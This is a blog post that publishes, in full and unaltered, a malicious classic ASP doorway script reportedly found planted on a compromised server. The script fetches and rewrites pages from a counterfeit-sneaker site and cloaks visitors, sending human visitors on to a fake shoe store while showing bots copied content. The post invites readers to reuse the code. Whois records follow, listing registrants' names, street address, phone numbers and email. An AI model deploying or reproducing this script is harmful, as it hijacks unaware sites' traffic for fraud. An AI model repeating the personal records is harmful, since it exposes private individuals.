Daniele Davi'

HTML Parser in Classic ASP

Today I’ll show you a script written in classic ASP that can use some server vulnerability to provide traffic from an unaware website to another one through another unaware server.

It’s quite simple, so I’m not going to explain it in details.
This malicious code was founded on a server, and is provided as it is (I didn’t change or hide the malicious recipient) and is provided for solely educational purpose.

The educational purpose is related basically to the creation of an HTML Parser or XML Parser in classic ASP  and I’ll also show other  ASP functions examples.

Classic ASP

This file is called “airmaxonline2014wszat.asp” but on the victim server there where many similars in many folders with different names. Also you can save it with the name you prefer.

What changes in each file?
Basically the only 3 variables that changes are “fromsite“, “tourl” and “pageid“. “Jumptodomain” si always the same since the purpose of the operation is to bring traffic always to the same website.

Note how filename (and obviously tourl) sound like fromsite to have a better impact on referral analysis.
A more tricky aspect to avoid to have just a simple blank page that redirect to the target website is to get the HTML of the middle-tier web page so that on the it seems a real exitant full-of-contents page.

Enjoy the code.

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<%
On Error Resume Next
dim jumptodomain, imagefolder, fromsite, tourl
jumptodomain = "www.ebrandshoe.com"
fromsite = "http://www.airmaxonline2014.com/" 
tourl ="http://www.foo.com/airmaxonline2014wszat.asp"
pageid = "airmaxonline2014" 
imagefolder = "images/"
tourl = tourl&"?"&pageid&"="

        Function GetLocationURL() 
	Dim Url 
	Dim ServerPort,ServerName,ScriptName,QueryString 
	ServerName = Request.ServerVariables("SERVER_NAME") 
	ServerPort = Request.ServerVariables("SERVER_PORT") 
	ScriptName = Request.ServerVariables("SCRIPT_NAME") 
	QueryString = Request.ServerVariables("QUERY_STRING") 
	Url="http://"&ServerName 
	If ServerPort <> "80" Then Url = Url & ":" & ServerPort 
	Url=Url&ScriptName 
	If QueryString <>"" Then Url=Url&"?"& QueryString 
	GetLocationURL=Server.URLEncode(Url)
End Function
Function GetCode(str,regstr)
	Dim Reg,serStr,Cols
	Set Reg= new RegExp
	Reg.IgnoreCase = True
	Reg.MultiLine = True
	Reg.Pattern =regstr
	If Reg.test(str) Then
	   Set Cols = Reg.Execute(str)
	   GetCode=Cols(0).SubMatches(0)
	Else 
	   GetCode=""
	End If
	Set Cols = Nothing
	Set Reg = Nothing
End Function
%>
<%
on error resume next
Function  getHTTPPage(URL)
Set   HTTPReq   =   Server.createobject("Msxml2.XMLHTTP")    
HTTPReq.Open   "GET",   URL,   False 
HTTPReq.send 
If   HTTPReq.readyState   <>   4   Then   Exit   Function 
getHTTPPage   =   Bytes2bStr(HTTPReq.responseBody) 
Set   HTTPReq   =   Nothing 
End   Function
Function   Bytes2bStr(vin)
Dim   BytesStream,StringReturn
Set   BytesStream   =   Server.CreateObject("ADODB.Stream")
BytesStream.Type   =   2
BytesStream.Open
BytesStream.WriteText   vin
BytesStream.Position   =   0
BytesStream.Charset   =   "UTF-8"
BytesStream.Position   =   2
StringReturn   =BytesStream.ReadText
BytesStream.close 
Set   BytesStream   =   Nothing 
Bytes2bStr   =   StringReturn 
End   Function
if request(pageid)<>"" then
htmls = getHTTPPage(fromsite&request(pageid))
htmls =  replace(htmls,""&chr(34)&fromsite,""&chr(34)&"/")
htmls =  replace(htmls,""&chr(34)&"/"&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls =  replace(htmls,""&chr(34)&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls =  replace(htmls,""&chr(34)&"/includes/",""&chr(34)&fromsite&"includes/") 
htmls =  replace(htmls,""&chr(34)&"includes/",""&chr(34)&fromsite&"includes/") 
htmls =  replace(htmls,""&chr(34)&"/media/",""&chr(34)&fromsite&"media/") 
htmls =  replace(htmls,""&chr(34)&"media/",""&chr(34)&fromsite&"media/")
htmls =  replace(htmls,""&chr(34)&"/skin/",""&chr(34)&fromsite&"skin/") 
htmls =  replace(htmls,""&chr(34)&"js/",""&chr(34)&fromsite&"skin/")
htmls =  replace(htmls,""&chr(34)&"/js/",""&chr(34)&fromsite&"js/") 
htmls =  replace(htmls,""&chr(34)&"skin/",""&chr(34)&fromsite&"js/") 
htmls =  replace(htmls,"href="&chr(34),"href="&chr(34)&"/") 
htmls =  replace(htmls,"href="&chr(34)&"//","href="&chr(34)&"/") 
htmls =  replace(htmls,"href="&chr(34)&"/http","href="&chr(34)&"http") 
htmls =  replace(htmls,"href="&chr(34)&"/","href="&chr(34)&tourl) 
else
htmls = getHTTPPage(fromsite)
htmls =  replace(htmls,""&chr(34)&fromsite,""&chr(34)&"/")
htmls =  replace(htmls,""&chr(34)&"/"&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls =  replace(htmls,""&chr(34)&imagefolder,""&chr(34)&fromsite&imagefolder)
htmls =  replace(htmls,""&chr(34)&"/includes/",""&chr(34)&fromsite&"includes/") 
htmls =  replace(htmls,""&chr(34)&"includes/",""&chr(34)&fromsite&"includes/")
htmls =  replace(htmls,""&chr(34)&"/media/",""&chr(34)&fromsite&"media/") 
htmls =  replace(htmls,""&chr(34)&"media/",""&chr(34)&fromsite&"media/") 
htmls =  replace(htmls,""&chr(34)&"/skin/",""&chr(34)&fromsite&"skin/") 
htmls =  replace(htmls,""&chr(34)&"js/",""&chr(34)&fromsite&"skin/")
htmls =  replace(htmls,""&chr(34)&"/js/",""&chr(34)&fromsite&"js/") 
htmls =  replace(htmls,""&chr(34)&"skin/",""&chr(34)&fromsite&"js/") 
htmls =  replace(htmls,"href="&chr(34),"href="&chr(34)&"/") 
htmls =  replace(htmls,"href="&chr(34)&"//","href="&chr(34)&"/") 
htmls =  replace(htmls,"href="&chr(34)&"/http","href="&chr(34)&"http") 
htmls =  replace(htmls,"href="&chr(34)&"/","href="&chr(34)&tourl) 
end if

dim pagetitle
pagetitle = GetCode(htmls,"(.*?)<\/title>")
pagetitle = Server.URLEncode(pagetitle)
dim agent,language,referer
agent=request.servervariables("http_user_agent")
language=request.servervariables("HTTP_ACCEPT_LANGUAGE")
referer=request.servervariables("HTTP_REFERER")
if language = "" and referer = "" then
	if InStr(agent, "bot")<=0 then 		Response.Redirect "http://"&jumptodomain&"/?from="&GetLocationURL()&"&q="&pagetitle 		Response.End 	end if else 	Response.Redirect "http://"&jumptodomain&"/?from="&GetLocationURL()&"&q="&pagetitle 	Response.End end if response.write htmls %>

Of course it is natural to be courious about who tried to claim the benefit of this pages and anyone can performe a whois request on the two domains to know more about them. To make you a favour I’m just copying here what the whois returned to me so that you can save time.
The scammer:

Registrant Org	MING AI is associated with ~22 other domains	  
Registrar	GODADDY.COM, LLC
Registrar Status	clientDeleteProhibited, clientRenewProhibited, clientTransferProhibited, clientUpdateProhibited
Dates	Created on 2014-07-22 - Expires on 2015-07-22 - Updated on 2014-08-18	  
Name Server(s)	F1G1NS1.DNSPOD.NET (has 1,672,713 domains)
F1G1NS2.DNSPOD.NET (has 1,672,713 domains)
  
IP Address	109.235.50.202 - 12 other sites hosted on this server	  
IP Location	Netherlands - Utrecht - Houten - Xeneurope Vps Services
ASN	Netherlands AS47869 NETROUTING-AS Netrouting,NL (registered Sep 09, 2008)
Domain Status	Registered And Active Website
Whois History	11 records have been archived since 2011-05-14	  
IP History	5 changes on 5 unique IP addresses over 3 years	  
Registrar History	1 registrar with 1 drop	  
Hosting History	4 changes on 3 unique name servers over 3 years	  
Whois Server	whois.godaddy.com
 Website
Website Title	  EBrandShoe - Cheap NIKE - JUST DO IT, Enjoy buying cheap nike air max, nike free,nike air max ireland store are discount price and 100% quality goods!	  
Server Type	Apache/2.2.15
Response Code	200
SEO Score	83%	
Terms	3073 (Unique: 348, Linked: 2788)
Images	48 (Alt tags missing: 15)
Links	771   (Internal: 771, Outbound: 0)
Whois Record ( last updated on 2014-08-28 )
Domain Name: EBRANDSHOE.COM
Registrar URL: http://www.godaddy.com
Registrant Name: MING AI
Registrant Organization: 
Name Server: F1G1NS1.DNSPOD.NET
Name Server: F1G1NS2.DNSPOD.NET
DNSSEC: unsigned

The (unaware?) supporter:

airmaxonline2014.com | Domain Informations
Updated : 2014-06-12
Air Max Online 2014 Airmaxonline2014 airmaxonline2014.com Technicals Datas Page Rank : N/A IP : 94.242.255.127 IP-based Geolocation of Airmaxonline2014.com :   Luxembourg
IP-based Coordinate : latitude : 49.75 | longitude : 6.17 Status : Online (New)

Domain Name: AIRMAXONLINE2014.COM
Registry Domain ID: 1855988301_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: www.enom.com
Updated Date: 2014-04-24 03:37:24Z
Creation Date: 2014-04-24 10:37:00Z
Registrar Registration Expiration Date: 2015-04-24 10:37:00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Registrar Abuse Contact Email: abuse@enom.com
Registrar Abuse Contact Phone: +1.4252744500
Domain Status: clientTransferProhibited
Registry Registrant ID: 
Registrant Name: TIAN JING
Registrant Organization: 
Registrant Street: NO.516, XIBALIWA, SHIZHONGQU
Registrant City: JINAN
Registrant State/Province: SHANDONG
Registrant Postal Code: 250002
Registrant Country: CN
Registrant Phone: +86.5132973673
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext:
Registrant Email: NHURIE@SINA.COM
Registry Admin ID: 
Admin Name: TIAN JING
Admin Organization: 
Admin Street: NO.516, XIBALIWA, SHIZHONGQU
Admin City: JINAN
Admin State/Province: SHANDONG
Admin Postal Code: 250002
Admin Country: CN
Admin Phone: +86.5132973673
Admin Phone Ext: 
Admin Fax: 
Admin Fax Ext:
Admin Email: NHURIE@SINA.COM
Registry Tech ID: 
Tech Name: TIAN JING
Tech Organization: 
Tech Street: NO.516, XIBALIWA, SHIZHONGQU
Tech City: JINAN
Tech State/Province: SHANDONG
Tech Postal Code: 250002
Tech Country: CN
Tech Phone: +86.5132973673
Tech Phone Ext: 
Tech Fax: 
Tech Fax Ext: 
Tech Email: NHURIE@SINA.COM
Name Server: DNS1.NAME-SERVICES.COM
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
DNSSEC: unSigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
Last update of WHOIS database: 2014-04-24 03:37:24Z